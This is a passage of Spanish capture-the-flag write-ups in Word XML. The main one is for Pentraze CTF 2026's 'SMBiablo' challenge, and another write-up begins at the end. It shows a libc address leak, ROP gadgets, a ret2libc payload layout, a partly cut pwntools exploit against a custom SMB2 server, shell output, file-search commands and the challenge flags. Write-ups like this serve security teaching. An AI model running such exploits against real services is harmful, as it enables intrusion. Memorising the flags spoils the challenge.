        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>printf offset: 0x606f0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>libc base:     0x722580c70000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La dirección base se calculó mediante:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>\[ \text{libc base} = \text{printf leak} - \text{printf offset} \]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>\[ 0x722580cd06f0 - 0x606f0 = 0x722580c70000 \]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El resultado estaba alineado a página de memoria, lo que confirmó la coherencia del cálculo con la biblioteca proporcionada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Es importante señalar que estas direcciones corresponden a la ejecución documentada. No deben considerarse constantes universales para cualquier nueva instancia.</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6. Construcción de la cadena ret2libc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Con la base de libc conocida, se localizaron los siguientes elementos:</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ret:       0x722580c99cd6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pop rdi:   0x722580c9a3e5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/bin/sh:   0x722580e48678</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>system:    0x722580cc0d70</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El exploit construyó una cadena ROP con esta disposición:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Distribución del payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Padding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>56 bytes · A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Alineación de pila</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>pop rdi; ret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Preparar argumento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Dirección de /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Argumento de system()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>system()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ejecutar shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La instrucción </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>pop rdi; ret</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> permitía cargar en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>RDI</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> la dirección de la cadena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, utilizada como primer argumento de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> en la convención de llamadas x86-64.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> adicional se utilizó para ajustar la alineación de la pila antes de llamar a libc.</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7. Exploit final en Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se desarrolló el siguiente exploit utilizando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>pwntools</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Este automatiza la conexión, obtiene la dirección de libc, construye la cadena ROP y explota el desbordamiento.</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from pwn import *import structHOST = "34.135.253.132"PORT = 36102context.arch = "amd64"context.log_level = "info"libc = ELF("./libc.so.6", checksec=False)def packet(command, body=b""):    header = bytearray(64)    header[:4] = b"\xfeSMB"    struct.pack_into("&lt;H", header, 4, 64)    struct.pack_into("&lt;H", header, 12, command)    payload = bytes(header) + body    return p32(len(payload), endian="big") + payloadio = remote(HOST, PORT)io.recvuntil(b"Status     OPERATIONAL")io.recvrepeat(0.3)# Filtrar direccion de printfio.send(packet(0xffff))size = u32(io.recvn(4), endian="big")response = io.recvn(size)assert len(response) == 80assert response[:4] == b"\xfeSMB"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El script fue ejecutado mediante:</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python exploit.py</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8. Obtención de ejecución remota de comandos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La explotación fue exitosa. El servidor devolvió una respuesta SMB2 de 129 bytes y posteriormente aceptó comandos de shell.</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 Opening connection to 34.135.253.132 on port 36102: Done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[+] printf: 0x722580cd06f0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[+] libc base: 0x722580c70000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[*] Enviando SMB2 NEGOTIATE manipulado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[*] Respuesta SMB2: 129 bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[*] Probando shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[*] Switching to interactive mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SMBIABLO_PWN_OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La ejecución del comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> confirmó que se había conseguido una shell como usuario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ctf</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, con UID 1000.</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9. Localización y extracción de la flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Una vez obtenida la shell, se enumeró el sistema de archivos:</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ls -la /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ls -la /home/ctf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Posteriormente se buscaron archivos cuyos nombres contuvieran las palabras </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</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find /home /app /opt /tmp -type f \</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 -iname '*flag*' -o -iname '*secret*' \) \</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2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El servidor devolvió:</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/tmp/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finalmente, se leyó su contenido:</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cat /tmp/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Flag obtenida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>PENTRAZE{689a7ccd0836e3eebc165b9339f45dafc5be402ce46d630e045550cfc74ca5e3}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial" w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El reto SMBiablo, de Pentraze CTF 2026, se resolvió mediante la combinación de dos vulnerabilidades en una implementación personalizada del protocolo SMB2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La primera permitía filtrar una dirección de memoria de libc utilizando el comando especial </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>0xFFFF</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. La segunda consistía en un desbordamiento de pila durante el procesamiento del mensaje SMB2 NEGOTIATE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Combinando ambas vulnerabilidades fue posible superar la aleatorización de direcciones, construir una cadena ROP que invocaba </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>system("/bin/sh")</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y obtener una shell remota con permisos del usuario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ctf</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Finalmente, se encontró la flag en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/tmp/flag.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Resultado final: explotación exitosa, ejecución remota de comandos confirmada y flag recuperada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Este reto demuestra cómo una validación insuficiente de longitudes, combinada con una filtración de direcciones, puede convertir un servicio de red aparentemente funcional en un objetivo vulnerable a ejecución remota de código.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Write-up elaborado a partir del desensamblado, las pruebas y las salidas de terminal proporcionadas durante la resolución del reto.</w:t>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Normal"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="200"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="200"/>
        <w:jc w:val="start"/>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Write-up — Data Del Más Allá | Pentraze CTF 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reto resuelto · Flag verificada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Categoría: PWN Autor: Br0nco Evento: Pentraze CTF 2026 Sistema analizado: Windows PE32+ x86-64 Técnicas: Ingeniería inversa, análisis de WebSocket, desofuscación XOR, reconstrucción de SHA-256 y autenticación basada en sesiones. Herramientas: Fedora Linux, Python, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>websocket-client</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</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Flag obtenida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Flag real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Copiar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>PENTRAZE{d270e5e966d7302319843571d7f5a36426d8153b9f6c09552ec8d1285d0bb56f}</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1. Descripción del desafío</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockQuotation"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
